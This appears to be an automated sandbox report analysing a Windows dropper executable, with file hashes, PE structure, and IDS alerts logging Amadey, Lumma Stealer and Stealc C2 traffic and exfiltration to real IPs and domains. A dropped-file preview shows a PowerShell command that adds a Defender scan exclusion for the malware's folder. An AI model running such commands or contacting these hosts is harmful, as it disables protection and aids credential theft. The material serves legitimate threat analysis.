                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe
                                                                                                                                                                                                                                                            File Type:Non-ISO extended-ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2984
                                                                                                                                                                                                                                                            Entropy (8bit):5.255987407210476
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:1BBA8BA602B4EA48325453D5DECA12AF
                                                                                                                                                                                                                                                            SHA1:52D58D6C5E0E47673BC633D96B4F0AB9A3401E64
                                                                                                                                                                                                                                                            SHA-256:94EAEF47FDDF9BEDA5A0708EBAA7BD412B7DF75A8930E842B3E3F58738FC3A68
                                                                                                                                                                                                                                                            SHA-512:3195F0CB112BF33BE379B43BC76DA44CABE3A47B4D950AE957A2FAFA0ADE813A8AF2FCBA32B03577C8621B1723BF1473184C98276E8C18AA1EB334F0614D5D75
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:Ordner erstellt: C:\agfznulwo..Willkommen beim Textanalyseprogramm!..Geben Sie Text f.r die Analyse ein (2 Sekunden Zeit):...Die Zeit ist abgelaufen! Die Eingabe wurde nicht abgeschlossen...Generiere einen zuf.lligen Satz.....Generierter Satz: Auto Blume Katze Hund..Anzahl der W.rter: 4..Fehler beim Hinzuf.gen des Ausschlusses: Add-MpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: ..ConfigListExtension...At line:1 char:1..+ Add-MpPreference -ExclusionPath C:\agfznulwo..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], .. CimException.. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference.. ..Add-MpPreference : Operation failed with the following error: 0x%1!x!..At line:1 char:1..+ Add-MpPreference -ExclusionPath C:\agfznulwo..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : No
                                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Entropy (8bit):6.634808752309927
                                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                            File name:file.exe
                                                                                                                                                                                                                                                            File size:3'272'704 bytes
                                                                                                                                                                                                                                                            MD5:aefbd9e285960b704524b4c33b0c9567
                                                                                                                                                                                                                                                            SHA1:688eb719525b89f93db7d22bcbae38a13e7a973b
                                                                                                                                                                                                                                                            SHA256:bc240f565f4a4aab03cdf04b6ae4522179347145e338ef33df918e741afc5ebb
                                                                                                                                                                                                                                                            SHA512:9186ca00f1451b750f59bc999e696964866639a06018e4ad241dd5ddf85550ffdd370d91e72f45a04644f555c150021383e16b29f7c0c27cb8b7cf9465e0ad8f
                                                                                                                                                                                                                                                            SSDEEP:49152:iIUtVtTZ0pIj3/bL4zoK79ucME+bkhG+WA73nilkwo:iIkVtTZ0pIj3vK79ucL+b9A73R
                                                                                                                                                                                                                                                            TLSH:71E53BA26D0972CFD16A277C9527DD43592C4BBF871048D3A869ECBDADA3CC035B6C24
                                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                                                                                                                                            Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                            Entrypoint:0x71f000
                                                                                                                                                                                                                                                            Entrypoint Section:.taggant
                                                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                            Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                                            jmp 00007F7AB0B613EAh
                                                                                                                                                                                                                                                            bswap esi
                                                                                                                                                                                                                                                            xor dword ptr [eax], eax
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            jmp 00007F7AB0B633E5h
                                                                                                                                                                                                                                                            add byte ptr [edi], al
                                                                                                                                                                                                                                                            or al, byte ptr [eax]
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], dl
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [0000000Ah], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [edi], al
                                                                                                                                                                                                                                                            or al, byte ptr [eax]
                                                                                                                                                                                                                                                            add byte ptr [0000000Ah], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [edi], al
                                                                                                                                                                                                                                                            add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            adc byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add ecx, dword ptr [edx]
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x5d4.rsrc
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x31df180x10scoprlns
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x31dec80x18scoprlns
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                            0x10000x680000x68000e9c27cf1143573af03ea1b20d8469285False0.5535841721754807data7.057980979181412IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                            .rsrc0x690000x5d40x6001e55db351164df1643ae87d7efa3ee0fFalse0.4303385416666667data5.417125179370491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                            .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                            scoprlns0x6b0000x2b30000x2b300096f340cc5c5f19f55dcbcd8477a0d02aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                            mrzrmbbr0x31e0000x10000x600c8e6c62c65af4a78ee060157da668275False0.5924479166666666zlib compressed data5.050287983258223IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                            .taggant0x31f0000x30000x2200707d57aadac06ef43d2199f6b515f60dFalse0.0700827205882353DOS executable (COM)0.7607067544658207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                            RT_MANIFEST0x690700x3e4XML 1.0 document, ASCII text0.48092369477911645
                                                                                                                                                                                                                                                            RT_MANIFEST0x694540x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                                            kernel32.dlllstrcpy
                                                                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                            EnglishUnited States
                                                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                            2024-12-21T22:16:05.306446+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449758185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:09.986625+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44977031.41.244.1180TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:16.778945+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.449764TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:18.116305+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449786185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:19.568200+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44979131.41.244.1180TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:25.061905+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449792185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:25.216297+01002058397ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click)1192.168.2.4512711.1.1.153UDP
                                                                                                                                                                                                                                                            2024-12-21T22:16:26.516539+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44979331.41.244.1180TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:26.797914+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449794172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:26.797914+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449794172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:27.556841+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449794172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:27.556841+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449794172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:28.848986+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449795172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:28.848986+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449795172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:29.653320+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449795172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:29.653320+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449795172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:30.351540+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449796185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:31.771117+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449798172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:31.771117+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449798172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:31.803353+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44979731.41.244.1180TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:34.300779+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449799172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:34.300779+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449799172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:42.729419+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449800185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:44.182010+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44980431.41.244.1180TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:44.752503+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449799172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:46.381345+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449805172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:46.381345+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449805172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:51.393048+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449809185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:52.252326+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449811172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:52.252326+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449811172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:16:52.985500+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449813185.215.113.1680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:00.161237+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.44981894.130.188.57443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:00.216514+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449820185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:01.804739+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449822185.215.113.1680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:02.641066+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.44982194.130.188.57443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:03.292985+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449823172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:03.292985+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449823172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:05.883028+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.4508521.1.1.153UDP
                                                                                                                                                                                                                                                            2024-12-21T22:17:06.302972+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.4564761.1.1.153UDP
                                                                                                                                                                                                                                                            2024-12-21T22:17:06.306150+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config194.130.188.57443192.168.2.449827TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:06.792920+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.4552981.1.1.153UDP
                                                                                                                                                                                                                                                            2024-12-21T22:17:08.377859+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449830104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:08.377859+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449830104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:09.450089+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449830104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:09.450089+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449830104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:09.905486+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1194.130.188.57443192.168.2.449831TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:10.580936+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449834172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:10.580936+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449834172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:10.999882+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449835185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:11.127813+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449836104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:11.127813+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449836104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:11.230085+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449834172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:11.891945+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449836104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:11.891945+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449836104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:12.542317+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449839185.215.113.1680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:19.354390+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449851185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:20.904835+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449857185.215.113.1680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:22.517396+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.4650761.1.1.153UDP
                                                                                                                                                                                                                                                            2024-12-21T22:17:22.683856+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.4593731.1.1.153UDP
                                                                                                                                                                                                                                                            2024-12-21T22:17:22.719552+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449861104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:22.719552+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449861104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:23.701722+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449861104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:24.221958+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449864104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:24.221958+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449864104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:24.227416+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449863185.215.113.20680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:24.720819+01002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.449863185.215.113.20680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:24.868426+01002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config1185.215.113.20680192.168.2.449863TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:25.107335+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449864104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:25.107335+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449864104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:25.196492+01002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.449863185.215.113.20680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:25.325798+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1185.215.113.20680192.168.2.449863TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:26.221008+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449867104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:26.221008+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449867104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:26.381568+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449868104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:26.381568+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449868104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:27.085923+01002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.449863185.215.113.20680TCP
